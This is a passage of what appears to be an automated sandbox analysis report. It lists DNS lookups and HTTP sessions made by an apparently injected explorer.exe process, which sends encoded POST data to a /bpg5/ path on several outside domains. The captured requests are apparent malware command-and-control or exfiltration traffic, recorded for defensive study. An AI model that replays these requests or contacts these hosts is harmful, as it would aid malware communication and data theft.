                                                  May 25, 2023 11:36:08.579374075 CEST5968353192.168.2.48.8.8.8
                                                  May 25, 2023 11:36:08.629290104 CEST53596838.8.8.8192.168.2.4
                                                  May 25, 2023 11:36:18.964545012 CEST6416753192.168.2.48.8.8.8
                                                  May 25, 2023 11:36:19.007536888 CEST53641678.8.8.8192.168.2.4
                                                  May 25, 2023 11:36:29.170250893 CEST6100753192.168.2.48.8.8.8
                                                  May 25, 2023 11:36:29.250389099 CEST53610078.8.8.8192.168.2.4
                                                  May 25, 2023 11:36:41.511912107 CEST6068653192.168.2.48.8.8.8
                                                  May 25, 2023 11:36:41.546297073 CEST53606868.8.8.8192.168.2.4
                                                  May 25, 2023 11:36:51.720247984 CEST6112453192.168.2.48.8.8.8
                                                  May 25, 2023 11:36:51.910646915 CEST53611248.8.8.8192.168.2.4
                                                  May 25, 2023 11:36:56.361042976 CEST5944453192.168.2.48.8.8.8
                                                  May 25, 2023 11:36:56.381000042 CEST53594448.8.8.8192.168.2.4
                                                  May 25, 2023 11:36:59.754926920 CEST5557053192.168.2.48.8.8.8
                                                  May 25, 2023 11:36:59.934081078 CEST53555708.8.8.8192.168.2.4
                                                  May 25, 2023 11:37:06.066390038 CEST6490653192.168.2.48.8.8.8
                                                  May 25, 2023 11:37:06.339019060 CEST53649068.8.8.8192.168.2.4
                                                  May 25, 2023 11:37:17.807405949 CEST5944653192.168.2.48.8.8.8
                                                  May 25, 2023 11:37:18.077687979 CEST53594468.8.8.8192.168.2.4
                                                  May 25, 2023 11:37:29.791963100 CEST5086153192.168.2.48.8.8.8
                                                  May 25, 2023 11:37:29.837179899 CEST53508618.8.8.8192.168.2.4
                                                  May 25, 2023 11:37:40.638761044 CEST6108853192.168.2.48.8.8.8
                                                  May 25, 2023 11:37:40.692312956 CEST53610888.8.8.8192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  May 25, 2023 11:36:08.579374075 CEST192.168.2.48.8.8.80xb128Standard query (0)www.berlinhealthweek.comA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:18.964545012 CEST192.168.2.48.8.8.80x8befStandard query (0)www.musicandgros.comA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:29.170250893 CEST192.168.2.48.8.8.80x69acStandard query (0)www.gomarketing.infoA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:41.511912107 CEST192.168.2.48.8.8.80x510fStandard query (0)www.antalyabfe.comA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:51.720247984 CEST192.168.2.48.8.8.80xd801Standard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:56.361042976 CEST192.168.2.48.8.8.80x694aStandard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:59.754926920 CEST192.168.2.48.8.8.80x8b6eStandard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:37:06.066390038 CEST192.168.2.48.8.8.80xcaf2Standard query (0)www.rt66omm.comA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:37:17.807405949 CEST192.168.2.48.8.8.80xeb0bStandard query (0)www.haynicorpon.bizA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:37:29.791963100 CEST192.168.2.48.8.8.80x45a6Standard query (0)www.vns96.netA (IP address)IN (0x0001)false
                                                  May 25, 2023 11:37:40.638761044 CEST192.168.2.48.8.8.80xa3bStandard query (0)www.thetowerbells.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  May 25, 2023 11:36:08.629290104 CEST8.8.8.8192.168.2.40xb128No error (0)www.berlinhealthweek.com130.185.109.77A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:19.007536888 CEST8.8.8.8192.168.2.40x8befNo error (0)www.musicandgros.commusicandgros.comCNAME (Canonical name)IN (0x0001)false
                                                  May 25, 2023 11:36:19.007536888 CEST8.8.8.8192.168.2.40x8befNo error (0)musicandgros.com81.169.145.93A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:29.250389099 CEST8.8.8.8192.168.2.40x69acNo error (0)www.gomarketing.info198.177.124.57A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:41.546297073 CEST8.8.8.8192.168.2.40x510fNo error (0)www.antalyabfe.com188.114.96.7A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:41.546297073 CEST8.8.8.8192.168.2.40x510fNo error (0)www.antalyabfe.com188.114.97.7A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:51.910646915 CEST8.8.8.8192.168.2.40xd801No error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:56.381000042 CEST8.8.8.8192.168.2.40x694aNo error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:36:59.934081078 CEST8.8.8.8192.168.2.40x8b6eNo error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:37:06.339019060 CEST8.8.8.8192.168.2.40xcaf2No error (0)www.rt66omm.com118.27.125.172A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:37:18.077687979 CEST8.8.8.8192.168.2.40xeb0bNo error (0)www.haynicorpon.biz183.90.228.46A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:37:29.837179899 CEST8.8.8.8192.168.2.40x45a6No error (0)www.vns96.net104.194.229.198A (IP address)IN (0x0001)false
                                                  May 25, 2023 11:37:40.692312956 CEST8.8.8.8192.168.2.40xa3bNo error (0)www.thetowerbells.com185.134.245.113A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.berlinhealthweek.com
                                                  • www.musicandgros.com
                                                  • www.gomarketing.info
                                                  • www.antalyabfe.com
                                                  • www.rt66omm.com
                                                  • www.haynicorpon.biz
                                                  • www.vns96.net
                                                  • www.thetowerbells.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.449694130.185.109.7780C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:08.654386997 CEST0OUTGET /bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P HTTP/1.1
                                                  Host: www.berlinhealthweek.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 25, 2023 11:36:08.672518015 CEST1INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.6.2
                                                  Date: Thu, 25 May 2023 09:36:08 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 168
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.44969581.169.145.9380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:19.035978079 CEST3OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.musicandgros.com
                                                  Connection: close
                                                  Content-Length: 1482
                                                  Cache-Control: no-cache
                                                  Origin: http://www.musicandgros.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.musicandgros.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 56 34 37 42 38 67 31 53 45 32 6b 42 6c 4c 37 54 44 79 6b 44 74 4b 46 36 61 44 79 6e 69 6a 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 57 78 7a 4a 79 6e 6e 4c 45 46 58 43 71 47 58 6b 35 36 42 68 70 4a 5f 31 44 6c 38 43 65 6c 35 36 51 77 39 35 6f 49 4d 74 56 35 55 65 78 68 66 4f 6b 6d 74 42 44 38 57 37 39 48 71 63 33 4c 76 75 4e 6f 78 4e 6b 4b 7a 6e 37 74 51 28 63 58 4d 75 45 4a 75 45 68 44 56 6e 41 50 6f 6f 31 47 45 4e 5f 35 6f 6d 38 28 32 6e 53 76 76 72 56 57 71 75 6c 5a 63 78 42 4e 6f 4d 61 6b 37 38 53 65 65 33 32 59 77 53 4a 70 4e 35 6f 34 56 46 7a 61 35 79 65 47 5f 48 43 4f 70 79 69 6a 38 4c 56 59 36 4f 4d 73 4c 36 44 65 43 6c 52 72 66 73 57 67 71 77 50 61 5a 66 49 36 43 6a 7a 76 45 7e 43 75 33 74 37 4d 4a 30 54 36 46 76 39 73 36 52 70 6e 79 69 5f 73 51 5a 76 77 73 73 57 72 69 78 6e 36 48 47 39 33 6b 42 41 49 66 46 73 55 70 35 43 67 53 65 5f 68 50 65 6d 32 5a 30 33 37 46 77 6e 4e 52 33 44 78 42 66 2d 69 57 46 36 45 46 7a 78 48 5f 42 55 6d 43 69 71 45 53 48 79 61 57 6f 44 54 78 77 47 42 4f 67 37 49 79 54 6d 4d 53 7e 33 37 67 72 75 57 38 45 4c 4e 71 77 59 51 49 4e 65 58 54 57 76 37 31 62 54 6c 71 5a 66 31 50 72 44 35 50 6d 38 55 68 50 78 36 61 48 47 71 61 79 73 70 49 32 76 39 5a 71 37 5a 31 68 46 32 6c 74 33 66 73 65 4c 28 6c 7a 6f 28 4e 30 4e 28 57 6b 4f 47 5f 4a 36 36 41 69 77 6c 54 66 54 35 44 59 2d 66 77 62 6c 61 41 52 73 7a 73 4e 76 31 45 4e 47 4e 6a 66 56 49 4f 6c 53 77 6b 70 6a 66 44 54 5f 48 41 69 47 4c 6e 34 5a 33 6c 72 57 75 78 54 4a 56 4e 43 66 58 52 61 78 61 70 49 4e 48 6c 61 4a 34 36 6e 48 35 61 54 67 53 67 6c 63 52 49 61 74 28 71 61 53 72 36 37 6c 6a 59 71 74 57 57 38 2d 33 47 41 50 56 72 73 78
                                                  Data Ascii: lpw7=jKc5GkmqQWJekDmjcSfAcgn2fq6Dle3OtzPR2QyTx2or25bp0CYB5rSZFNhej1JopUz0Vvn1yE2zgMRiVgYLBFSlq7(qew7kPmZR2Q59~7boXybxLT5RL7rLMVkU98NMEYJ6z9PogW8TUPrGpk80r0h5NTFKSBDewVp-zkbu4mRuHXoBatAl0ppMP30B2Z3ErwWmm2A9T0A-~pjSUh(JXLJ-bTKWjCNELx~kjWikEdlAr9vgaiAnE0YphEerXp2lXdw5EENSNhr1YLtmsVy7pToYV47B8g1SE2kBlL7TDykDtKF6aDynijfS9851Czurpkyo996evdxyeJ7X5OASj_4nLl5EUbcvG2DKNH~C8v5OR6tX0B0ycKDWkJALqwPWn1gDDeg-vSgOeU(AKgBVKHpOd_8A(OVleVAvn230TO0lRQl7iv7an65ymhwdpr93QN342uT97PP_~AS3WsMWT9UlRukXIEjL~WsIhsCQOGETxqlDOiPyL7d2MgyCzZD8J9cvh6se6BtoQFDvtWKstt3x98IXI5Y6EQyGr3aeBdAmPxtb0plJMKVsqlaBul0-sGT3y-I4glyoguqO4TmOBHfOcrFv9hm1q09xJg(d58EgMba7JOqkaltrCBxYBJFX2MegLp8s1wRN(NlSqD9coyFkG373UROtFMMfmO482rJvhmpV~fPqz5SxUqVQccQQV4ATUzbbKJnkJ-wY~nhI2-VKIaP0HLFk6k8ZHMR1(FDN87kGq5ERvix-lmPleELzxgXzzypjChrFShI8p0OQ84vb1BCdT1WX3QFbsjQcMszssOpuhar_LQZDhvPTQupLokr9PGnXVceu4H~fAROl2qnv1WxzJynnLEFXCqGXk56BhpJ_1Dl8Cel56Qw95oIMtV5UexhfOkmtBD8W79Hqc3LvuNoxNkKzn7tQ(cXMuEJuEhDVnAPoo1GEN_5om8(2nSvvrVWqulZcxBNoMak78See32YwSJpN5o4VFza5yeG_HCOpyij8LVY6OMsL6DeClRrfsWgqwPaZfI6CjzvE~Cu3t7MJ0T6Fv9s6Rpnyi_sQZvwssWrixn6HG93kBAIfFsUp5CgSe_hPem2Z037FwnNR3DxBf-iWF6EFzxH_BUmCiqESHyaWoDTxwGBOg7IyTmMS~37gruW8ELNqwYQINeXTWv71bTlqZf1PrD5Pm8UhPx6aHGqayspI2v9Zq7Z1hF2lt3fseL(lzo(N0N(WkOG_J66AiwlTfT5DY-fwblaARszsNv1ENGNjfVIOlSwkpjfDT_HAiGLn4Z3lrWuxTJVNCfXRaxapINHlaJ46nH5aTgSglcRIat(qaSr67ljYqtWW8-3GAPVrsxbPdIkl4N1PBpZMsLh2B1fNa6nkjhY49PXS9P2al0s2zc2f9WDihS0dHSlAsnn2Gqy2T71QPVT9YxoLUisD61Yr8mfvcEiSYhOL3Ye0aEdlTTUuuTQq3Q).
                                                  May 25, 2023 11:36:19.057729959 CEST4INHTTP/1.1 404 Not Found
                                                  Date: Thu, 25 May 2023 09:36:19 GMT
                                                  Server: Apache/2.4.57 (Unix)
                                                  Content-Length: 196
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  10192.168.2.449710118.27.125.17280C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:06.611665964 CEST59OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.rt66omm.com
                                                  Connection: close
                                                  Content-Length: 1482
                                                  Cache-Control: no-cache
                                                  Origin: http://www.rt66omm.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.rt66omm.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 49 46 38 54 48 30 74 43 62 68 34 68 71 56 58 7a 77 55 7a 37 6d 33 66 4a 45 7e 70 48 4e 41 69 73 47 46 72 4a 42 31 53 72 64 78 39 68 31 6a 6b 59 4b 28 38 54 4e 50 6a 28 6e 35 57 33 6a 55 4c 34 58 68 4f 6d 36 64 33 47 50 57 2d 71 58 34 43 76 45 4c 42 64 73 74 65 4a 4c 4c 69 31 70 4b 43 31 47 4c 2d 6c 37 76 70 75 6d 4e 4e 48 56 74 53 76 6f 6e 4a 34 43 4e 4b 69 72 51 5f 51 58 57 51 49 63 64 62 61 67 44 6c 49 72 64 41 6d 33 5a 63 37 65 43 4e 6c 2d 62 43 33 55 4f 37 6c 43 4e 52 36 6d 43 6a 35 43 53 36 6d 50 71 72 37 59 4f 6f 6c 67 4b 48 54 58 6a 62 63 34 49 50 61 2d 69 4b 74 4e 69 5f 47 48 4b 6e 52 59 70 4d 4e 43 51 5f 38 71 50 31 4e 55 4f 53 50 51 73 43 4b 43 6a 6e 4e 50 35 51 68 55 53 65 46 56 30 74 52 47 45 34 55 46 76 61 4a 6d 72 47 61 31 61 65 77 68 75 69 56 65 61 6f 64 50 32 44 33 51 32 7a 31 45 47 6c 61 74 4a 66 7e 33 4d 38 47 62 43 44 51 6c 4d 4d 46 38 53 77 76 39 5a 7a 6f 56 42 61 5a 61 45 4d 35 34 65 30 44 57 67 55 56 5f 6c 64 6e 75 57 34 44 50 30 4d 54 70 48 72 49 69 51 53 65 49 61 49 36 43 33 49 41 79 4a 71 36 65 28 5a 31 65 63 71 4e 46 31 58 41 6c 36 2d 57 79 41 5f 45 49 53 36 36 35 71 53 50 33 48 57 4c 66 64 63 51 55 45 53 7a 73 52 76 50 51 43 70 33 56 42 6a 39 46 28 49 4b 4b 54 68 66 39 75 4a 79 6e 4e 47 57 72 36 58 50 50 45 32 76 78 5a 56 7e 47 42 66 63 34 42 37 28 67 41 61 37 51 63 5a 74 70 30 5a 4a 7a 72 6f 55 34 71 4d 36 62 56 52 31 35 36 50 4e 46 41 4a 74 77 44 75 69 4e 31 4f 32 39 72 74 61 71 36 63 41 36 34 70 57 76 6e 4e 64 37 38 56 52 76 51 30 4a 77 35 46 46 48 51 43 47 67 37 69 66 45 52 41 4f 72 6b 65 6c 68 75 4d 37 2d 43 41 65 30 35 63 4a 63 7e 2d 38 68 66 4c 54 54 6b 32 66 72 65 74 54 64 39 45 45 54 43 32 6b 45 45 37 37 45 67 77 41 65 70 77 64 72 65 4a 49 39 6e 4a 50 6d 43 7a 32 65 74 45 63 37 49 45 63 62 30 6f 6d 49 63 51 52 4d 48 64 30 4e 6d 79 65 61 51 6f 77 69 47 42 48 56 6d 4f 34 5a 59 51 64 79 39 71 58 34 65 30 6a 4e 50 73 34 72 42 52 35 36 6f 54 32 73 44 78 70 2d 42 33 67 76 39 4e 65 39 66 34 36 66 37 4f 62 61 76 43 44 51 76 49 62 76 58 49 38 73 45 2d 53 45 36 50 34 43 6b 39 74 6a 58 74 6b 4a 30 48 6b 65 53 70 58 55 6b 75 6c 38 6e 4d 79 62 72 75 59 4f 69 53 7e 72 59 52 4d 45 50 4f 65 57 45 6a 54 30 6b 54 36 56 30 5a 43 74 34 41 4d 74 78 71 58 4f 6e 38 59 7a 6a 53 54 58 56 79 44 77 44 65 39 38 6b 6d 49 61 32 5f 76 59 4b 52 4f 61 7a 6c 6b 63 51 30 69 6a 66 51 44 72 42 59 67 75 69 46 7a 61 41 4f 48 2d 75 6d 33 61 74 5a 74 34 33 31 4f 69 30 56 4f 76 37 39 34 63 4f 78 69 48 71 4d 66 32 55 42 52 6f 44 56 44 6f 6e 52 5a 32 36 74 54 42 67 6c 76 50 76 70 4c 33 50 72 4c 64 6f 33 6f 56 66 49 35 4c 70 39 4c 42 66 58 41 2d 59 70 44 33 67 4d 67 36 6b 49 63 46 46 33 61 36 79 63 51 75 5a 4f 39 72 49 6e 57 44 68 67 62 54 72 34 47 71 76 55 70 41 67 6e 45 38 37 4c 30 6c 5a 46 64 67 64 4a 4a 58 6b 72 30 77 34 41 42 59 37 6c 39 42 50 4d 5a 4a 72 79 4b 61 45 33 55 71 4d 43 79 6f 6d 61 67 6c 55 2d 70 47 31 6a 32 6a 4b 5f 30 70 48 57 66 4c 43 6a 62 35 68 46 46 39 6c 31 39 75 37 33 64 33 45 45 50 39 69 4e 73 44 73 66 6e 6c 34 47 38 6a 43 65 76 4f 47 47 77 46 64 43 34 62 63 7a 62 5a 33 78 76 74 62 46 4b 75 72 61 39 61 72 56 47 46 7e 77 4d 42 4e 5a 58 74 58 71 32 6e 4a 58 7a 4a 37 46 6b 4e 34 32 62 36 43 41 77 44 4e 62 73 6b 48 46 76 4a 31 66 7e 73 57 61 6e 62 50 41 6a 37 6f 53 6e 59 6a 69 46 64 4d 51 4c 57 65 33 71 68 70 58 6a 32 69 68 68 48 47 4a 62 42 32 79 6f 6a 6f 76 4a 57 34 61 6f 76 70 31 34 44 76 56 39 67 38 69 47 56 74 58 34 7a 67 6b 66 4e 4f 37 7e 7a 55 49 4c 76 45 45 67 4b 5a 6b 6a 45 32 63 78 37 4a 59 53 65 4a 4a 41 65 76 69 63 6c 6e 37 63 4e 35 63 6e 76 6c 74 42 4e 69 43 41 34 59 64 46 6d 6a 55 32 6c 53 65 31 37 51 64 4b 32 42 6a 77 51 7e 7a 64 38 63 78 48 42 69 34 69 78 6f 6b 53 64 34 6e 45 67 41 32 32 2d 39 6a 6c 41 78 4b 6e 7a 5a 36 7a 77 47 72 48 41 45 65 53 55 56 6a 47 6f 56 69 64 65 44 49 61 4c 28 31 6a 7a 67 67 6a 37 35 50 52 42 42 47 59 68 42 72 53 34 49 75 4a 43 32 4b 62 72 34 76 7a 39 68 56 34 37 4f 77 75 4b 47 5f 36 61 7e 55 62 62 51 41 75 51 6e 4c 43 35 7e 38 61 59 4b 6f 6a 39 76 4b 65 33 75 6f 33 35 4c 30 33 35 4c 4c 71 61 53 54 35 2d
                                                  Data Ascii: lpw7=bnjuuu8f3kRfdIF8TH0tCbh4hqVXzwUz7m3fJE~pHNAisGFrJB1Srdx9h1jkYK(8TNPj(n5W3jUL4XhOm6d3GPW-qX4CvELBdsteJLLi1pKC1GL-l7vpumNNHVtSvonJ4CNKirQ_QXWQIcdbagDlIrdAm3Zc7eCNl-bC3UO7lCNR6mCj5CS6mPqr7YOolgKHTXjbc4IPa-iKtNi_GHKnRYpMNCQ_8qP1NUOSPQsCKCjnNP5QhUSeFV0tRGE4UFvaJmrGa1aewhuiVeaodP2D3Q2z1EGlatJf~3M8GbCDQlMMF8Swv9ZzoVBaZaEM54e0DWgUV_ldnuW4DP0MTpHrIiQSeIaI6C3IAyJq6e(Z1ecqNF1XAl6-WyA_EIS665qSP3HWLfdcQUESzsRvPQCp3VBj9F(IKKThf9uJynNGWr6XPPE2vxZV~GBfc4B7(gAa7QcZtp0ZJzroU4qM6bVR156PNFAJtwDuiN1O29rtaq6cA64pWvnNd78VRvQ0Jw5FFHQCGg7ifERAOrkelhuM7-CAe05cJc~-8hfLTTk2fretTd9EETC2kEE77EgwAepwdreJI9nJPmCz2etEc7IEcb0omIcQRMHd0NmyeaQowiGBHVmO4ZYQdy9qX4e0jNPs4rBR56oT2sDxp-B3gv9Ne9f46f7ObavCDQvIbvXI8sE-SE6P4Ck9tjXtkJ0HkeSpXUkul8nMybruYOiS~rYRMEPOeWEjT0kT6V0ZCt4AMtxqXOn8YzjSTXVyDwDe98kmIa2_vYKROazlkcQ0ijfQDrBYguiFzaAOH-um3atZt431Oi0VOv794cOxiHqMf2UBRoDVDonRZ26tTBglvPvpL3PrLdo3oVfI5Lp9LBfXA-YpD3gMg6kIcFF3a6ycQuZO9rInWDhgbTr4GqvUpAgnE87L0lZFdgdJJXkr0w4ABY7l9BPMZJryKaE3UqMCyomaglU-pG1j2jK_0pHWfLCjb5hFF9l19u73d3EEP9iNsDsfnl4G8jCevOGGwFdC4bczbZ3xvtbFKura9arVGF~wMBNZXtXq2nJXzJ7FkN42b6CAwDNbskHFvJ1f~sWanbPAj7oSnYjiFdMQLWe3qhpXj2ihhHGJbB2yojovJW4aovp14DvV9g8iGVtX4zgkfNO7~zUILvEEgKZkjE2cx7JYSeJJAevicln7cN5cnvltBNiCA4YdFmjU2lSe17QdK2BjwQ~zd8cxHBi4ixokSd4nEgA22-9jlAxKnzZ6zwGrHAEeSUVjGoVideDIaL(1jzggj75PRBBGYhBrS4IuJC2Kbr4vz9hV47OwuKG_6a~UbbQAuQnLC5~8aYKoj9vKe3uo35L035LLqaST5-sEGBGkjAP7~piBXFSIDNo1ufKr7Lf7h45CpIwS0o5RDWW3MdwPRO1d7v48MhKrh6GmxJON9zaQ6et36bs9SiHxBPSyzN~SDqfakasX82V6sEglrwwuNQ).
                                                  May 25, 2023 11:37:07.054176092 CEST60INHTTP/1.1 404 Not Found
                                                  Date: Thu, 25 May 2023 09:37:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Server: LiteSpeed
                                                  x-powered-by: PHP/8.1.19
                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                  link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"
                                                  content-encoding: gzip
                                                  vary: Accept-Encoding,Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed
